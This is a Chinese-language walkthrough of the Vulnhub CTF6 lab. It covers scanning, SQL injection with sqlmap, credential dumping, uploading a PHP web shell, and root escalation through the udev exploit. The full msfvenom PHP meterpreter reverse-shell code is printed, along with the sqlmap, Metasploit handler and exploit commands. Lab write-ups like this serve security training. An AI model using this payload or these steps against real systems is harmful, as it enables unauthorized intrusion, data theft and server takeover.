Vulnhub-CTF6靶机实战

前言

靶机下载地址：下载地址

KALI地址：192.168.10.73

靶机地址：192.168.10.40

---

一.信息收集

1.主机发现

使用命令如下，来进行主机发现

netdiscover -r 192.168.10.73

如下图发现了靶机地址

---

2.主机扫描

这使用的是nmap命令来进行的主机扫描，如下命令

nmap -A -T4 -p- 192.168.10.40

如下图，扫描结果，发现开放了很多端口

---

3.目录扫描

既然扫描端口开放了80端口，那么肯定是网站，那么二话不说直接来一通目录扫描，使用命令如下

dirb http://192.168.10.40

如下图，扫出来很多目录，红色箭头是我自己觉得可能很重要的目录

---

4.网页信息收集

我们打开网站首页发现类似于文章的页面，并且有login，证明可以登录，然后每篇文章都可以点Read More，但是点进去之后，发现上面URL地址，是id出头的，经过测试可以更换后面的数字进行文章跳转，如果在后面加一个其他字符，就不能跳转了，猜测可能有SQL注入，如下图。

根据上面信目录扫描，发现了一个邮件系统，如下图，可能有用

然后我们访问doc目录，发现了一个压缩包可以下载下来,并且里面还有一个phpinfo，可以看看php版本

我们访问sql目录，发现了一个文件，并且文件里面有密码和用户泄露，可能有用，如下图

然后根据目录扫描还发现了phpmyadmin如下图，可能后面有用

---

二.漏洞利用

1.SQL注入

根据上面网页信息收集，发现文章id可能有SQL注入，我们直接使用sqlmap一把梭试试看，如下命令

python sqlmap.py -u "http://192.168.10.40/?id=1" --dbs

如下图，爆破出了所有的数据库，这里就觉得cms数据库可疑就他了。

所以一路凭感觉就发现了账户密码，使用命令如下。

python sqlmap.py -u "http://192.168.10.40/?id=1" -D cms -T user -C user_username,user_password --dump

如下图，发现了账户密码，和上面网页信息收集的时候发现的账户密码一直对应了，这里猜测是后台登录密码和账户，正好首页有一个登录框。

账户：admin

密码：adminpass

---

2.文件上传

根据上面SQL注入获取到的密码账户，成功登录到了后台，然后在Add Event选项，发现了上传选项！！！这不得上传？如下图。

然后经过测试，发现这里上传根本没有过滤，直接上传php文件即可，这里我们打开KALI，输入命令如下来生成一个php木马。

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.10.73 LPORT=4444 -f raw

生成的木马代码如下

*<?php /**/ error_reporting(0); $ip = '192.168.10.73'; $port = 4444; if (($f = 'stream_socket_client') && is_callable($f)) { $s = $f("tcp://{$ip}:{$port}"); $s_type = 'stream'; } if (!$s && ($f = 'fsockopen') && is_callable($f)) { $s = $f($ip, $port); $s_type = 'stream'; } if (!$s && ($f = 'socket_create') && is_callable($f)) { $s = $f(AF_INET, SOCK_STREAM, SOL_TCP); $res = @socket_connect($s, $ip, $port); if (!$res) { die(); } $s_type = 'socket'; } if (!$s_type) { die('no socket funcs'); } if (!$s) { die('no socket'); } switch ($s_type) { case 'stream': $len = fread($s, 4); break; case 'socket': $len = socket_read($s, 4); break; } if (!$len) { die(); } $a = unpack("Nlen", $len); $len = $a['len']; $b = ''; while (strlen($b) < $len) { switch ($s_type) { case 'stream': $b .= fread($s, $len-strlen($b)); break; case 'socket': $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS['msgsock'] = $s; $GLOBALS['msgsock_type'] = $s_type; if (extension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval')) { $suhosin_bypass=create_function('', $b); $suhosin_bypass(); } else { eval($b); } die();

然后我们在再msf里面打开监听，操作流程如下

┌──(root㉿kali)-[~/Desktop] └─# msfconsole _---------..' ####### ;.".---,. ;@ @@`; .---,.. ." @@@@@'.,'@@ @@@@@',.'@@@@ ". '-.@@@@@@@@@@@@@ @@@@@@@@@@@@@ @;`.@@@@@@@@@@@@ @@@@@@@@@@@@@@ .'"--'.@@@ -.@ @ ,'- .'--"".@' ; @ @ `. ;'|@@@@ @@@ @ .' @@@ @@ @@ ,`.@@@@ @@ . ',@@ @ ; _____________ ( 3 C ) /|___ / Metasploit! \ ;@'. __*__,." \|--- \_____________/ '(.,...."/ =[ metasploit v6.1.27-dev ] + -- --=[ 2196 exploits - 1162 auxiliary - 400 post ] + -- --=[ 596 payloads - 45 encoders - 10 nops ] + -- --=[ 9 evasion ]Metasploit tip: View all productivity tips with the tips commandmsf6 > use exploit/multi/handler [*] Using configured payload generic/shell_reverse_tcp msf6 exploit(multi/handler) > show options Module options (exploit/multi/handler):Name Current Setting Required Description---- --------------- -------- -----------Payload options (generic/shell_reverse_tcp):Name Current Setting Required Description---- --------------- -------- -----------LHOST yes The listen address (an interface may be specified)LPORT 4444 yes The listen portExploit target:Id Name-- ----0 Wildcard Targetmsf6 exploit(multi/handler) > set LHOST 192.168.10.73 LHOST => 192.168.10.73 msf6 exploit(multi/handler) > set payload php/meterpreter/reverse_tcp payload => php/meterpreter/reverse_tcp msf6 exploit(multi/handler) > exploit [*] Started reverse TCP handler on 192.168.10.73:4444

之后我们再把生成的木马的代码，放进一个php文件里面然后直接上传上去即可，如下图

怎么找到路径呢，我们回到首页，然后如下图所示打开即可

打开之后，发现就成功反弹了meterpreter如下图。

---

三.提权

来到了后台，再meterpreter的地方输入shell来获取一个控制台，然后输入命令whereis python来查找靶机是否有python，发现是有的然后再输入python -c "import pty; pty.spawn('/bin/bah')"来获取一个新的binbash，如下图。

之后就可以再靶机里面找信息，查看是否有提权的可能，经过一番查找(指的是找了半小时)，发现再系统层面，系统内核是2.6！！！，如下图，查看命令是uname -a。

1.udev提权

udev漏洞针对的是linux2.6的内核，正好靶机是这个内核，所以这里可以使用udev漏洞来进行提权，首先我们去kali搜索是否拥有这个提权文件，发现是有的，搜索命令是searchsploit udev,如下图。

然后我们把这个文件复制到桌面，使用命令如下。

cp /usr/share/exploitdb/exploits/linux/local/8478.sh ./

然后我们使用meterpreter来把文件上传到靶机的/tmp文件夹，命令是upload /root/Desktop/8478.sh /tmp，需要在meterpreter的命令行输入，如果从shell回到meterpreter的命令行只需要按ctrl +c即可，然后方便做下一步操作，如下图。

回到靶机，cd到tmp文件夹，发现提权文件已经在里面了，我们现在只需要给文件赋予777权限，命令是chmod 777 8478.sh

然后我们在查看一下udev id查看命令是ps -ef |grep udev，如下图，发现是568

之后我们执行文件的时候加上这个id即可提权，如下图提权成功，命令是./8478.sh 568

如下图提权，成功，发现id变成了root，并且$变成了#，完成！

---

四.总结

udev提权很重要

总结

以上是生活随笔为你收集整理的Vulnhub-CTF6靶机实战的全部内容，希望文章能够帮你解决所遇到的问题。

如果觉得生活随笔网站内容还不错，欢迎将生活随笔推荐给好友。